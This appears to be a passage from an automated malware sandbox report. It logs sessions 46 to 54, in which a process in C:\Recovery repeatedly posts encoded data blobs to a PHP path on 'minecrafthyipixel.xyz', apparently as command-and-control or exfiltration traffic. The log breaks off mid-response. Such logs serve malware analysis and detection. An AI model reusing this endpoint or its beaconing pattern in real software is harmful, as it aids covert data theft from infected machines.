                                                                                                                                    Data Ascii: WT^YYKT^\^YYWTX_TQ_^T]S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&-*W"+,X00^$8*>(29'245=;7_#,,:5$[. X )


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49794 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:03.980906010 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:04.085345984 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:04.085561037 CEST | 2512 | OUT | Data Raw: 57 5c 5b 58 5c 40 54 5e 5c 5e 59 59 57 55 58 5f 54 55 5f 57 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[X\@T^\^YYWUX_TU_WTXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2==!($' (0+!P*;;^&91;7T*);$4<$[-5$[. X -
Apr 19, 2024 13:43:04.342792034 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBHvbHSRVlr93wSVkaTOJFM2k702zVe%2BkdOtUOF%2BBTx1ZF8c9kNYZKFHgS6egPjxyYFGe%2FpNnjwMkYYcRx3dM3%2BjbA1KWipINeB4Wpd1gDuS6tHNCH8j3p6qu3Dtu1k4Sv9NVH%2BOwo8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2823a7c6776-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:04.342856884 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49795 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:04.563292027 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:43:04.667834997 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:04.668189049 CEST | 2512 | OUT | Data Raw: 57 5c 5b 59 5c 41 54 5f 5c 5e 59 59 57 5e 58 5c 54 50 5f 5a 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[Y\AT_\^YYW^X\TP_ZT^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z1>" ;;''8-V=+#&_#&+!!!=>+'_ 8-%$[. X
Apr 19, 2024 13:43:04.919308901 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXU6NW77TsTbDRyWx3tG5Hx6DYX1t2%2BbZYZQvjbSIZLtfZQIExwnDxLBDVTYa%2BCjeaYWvmbqNEsnFqEmkC5a97egNTmN8BcpOwEgej1PVRCugA0X2IkTmy1Z6tbGx5veYPt1MEAxRLs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca285de89b06a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:04.919373035 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49796 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:05.138351917 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:43:05.243153095 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:05.243311882 CEST | 2512 | OUT | Data Raw: 57 5c 5b 5c 59 40 54 59 5c 5e 59 59 57 56 58 5d 54 5a 5f 5b 54 59 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[\Y@TY\^YYWVX]TZ_[TYS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]&=6"+8\303\'P*('X&9S%+P#+('^4.5$[. X !
Apr 19, 2024 13:43:05.511735916 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:05 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vuBbmfOd4JMaMh3vUs9bptkqN0fAOZqGX8LiJqjdVCsNgyscBwMqPL9t1Mwf%2BDcPEZ90AsfX9duRl1t0a0uxlkZhLx%2Fqkc8knDw%2BESu21Zd%2F2QDUt35MrVprU5fEpxNQpa4FNcECbUU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca28978c244f6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:05.511800051 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49797 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:05.793297052 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:05.898139000 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:05.898308992 CEST | 2512 | OUT | Data Raw: 57 5f 5b 5c 59 47 54 59 5c 5e 59 59 57 55 58 5e 54 5a 5f 58 54 5c 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[\YGTY\^YYWUX^TZ_XT\S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>2V"+7$340;=7\1_ 28)4"2Q>+' 0:$[. X -
Apr 19, 2024 13:43:06.152725935 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5arPmQ08188wz9R4F8EV3k2VZLOmvBIR47W6Ogad0KKqd1sLOSLNIrJWAAZeLIRIk6Mon9wngvLfCkF8f1aFob8Blth9sP8%2FJsiTj8YbVnifu6LX2Evn%2BvUVLQn6QTp7P2IR60d31g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca28d8d725082-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:06.152790070 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    50 | 192.168.2.4 | 49798 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:06.372960091 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:06.477371931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:06.477551937 CEST | 2512 | OUT | Data Raw: 57 5e 5e 54 5c 43 54 5d 5c 5e 59 59 57 53 58 5e 54 50 5f 5a 54 54 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^T\CT]\^YYWSX^TP_ZTTS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%=)5++&3$$+==(7^'*#%+172)*;/^",'.5$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:06.745974064 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmHWiYSSliBiLSbF6EC1iBlt318XDMtLhojnCojit2ByiTUG8nx7IbDMHNCwOmVtJy%2Biou3SdeZuJmlbPy8GSY4gr%2B4jUat%2F2NMH4bdkptqi65uMF2YEDTLtieb9oE3VHlFaw1iGv6o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca291288eb09f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:06.746067047 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    51 | 192.168.2.4 | 49800 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:07.096333981 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:07.200900078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:07.201199055 CEST | 2512 | OUT | Data Raw: 57 55 5e 58 59 42 54 55 5c 5e 59 59 57 53 58 5b 54 53 5f 5e 54 54 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU^XYBTU\^YYWSX[TS_^TTS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>U5(;0%+T=+$&)T$82Q722Q*8;\",]9$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:07.501543045 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:07 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WSxydCVqkNAfEp6hB1Mcjb2xexPCrERXTMdajQez3AY55U0iuMVeEMqVv2FIxNYUZy5tuIrsjlMTBayle%2BYkELz%2B1jng5MJUjcoKOIQTNajdR0nTk0gixdCwj02hdcaDmbhDiU8wMNk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca295bcec1d7a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:07.501606941 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    52 | 192.168.2.4 | 49801 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:07.755150080 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:07.860224009 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:07.862157106 CEST | 2504 | OUT | Data Raw: 57 5a 5b 5e 59 46 54 5e 5c 5e 59 59 57 57 58 59 54 53 5f 5a 54 59 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[^YFT^\^YYWWXYTS_ZTYS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>)5;$V7]3=8;':0T1"#!.Q)(' / Z:5$[. X -
                                                                                                                                    Apr 19, 2024 13:43:08.122669935 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzUCNxiQAD6MLcNcd723sQVx008E5vopE5W3o4FpFvY0AEl0oXveiRvuZm2gqJQukURLCrShQq0ZbQ35dWMPbH1hRvNlqFb%2BbLRIBJ78EoizC8MbgUhEEkfPhH%2FOabpKOQ2Rwesp9%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca299c82ead98-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:08.122725010 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    53 | 192.168.2.4 | 49802 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:08.348087072 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:08.452589989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:08.452737093 CEST | 2512 | OUT | Data Raw: 57 5e 5b 58 59 47 54 5c 5c 5e 59 59 57 52 58 59 54 54 5f 58 54 5f 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^[XYGT\\^YYWRXYTT_XT_SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[1V!]?$37^%(*?++_':$R16V &W*84489$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:08.825794935 CEST | 633 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:08 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LxfqE42iFs%2BidKzlMHMEZPVOAa%2FKDMh0SskOPQW52M%2B%2FzfsIfp731FdrVza8%2FvMGP%2BkexhQEim1cQjb8a7d88rEQA5lh61VJQSd%2FtR9adAtMC5vLcFGAw8Vev8V1jr%2F%2F9X5l9%2B9gncU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca29d8e4312d7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:08.825858116 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    54 | 192.168.2.4 | 49803 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:09.087224007 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:09.192301989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:09.192684889 CEST | 2192 | OUT | Data Raw: 57 5d 5e 58 5c 40 51 58 5c 5e 59 59 57 54 58 5b 54 53 5f 56 54 58 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^X\@QX\^YYWTX[TS_VTXSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\&>"T"#$ 0+!P=8Y19&+!4"*=' / [-5$[. X )
                                                                                                                                    Apr 19, 2024 13:43:09.447213888 CEST | 776 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
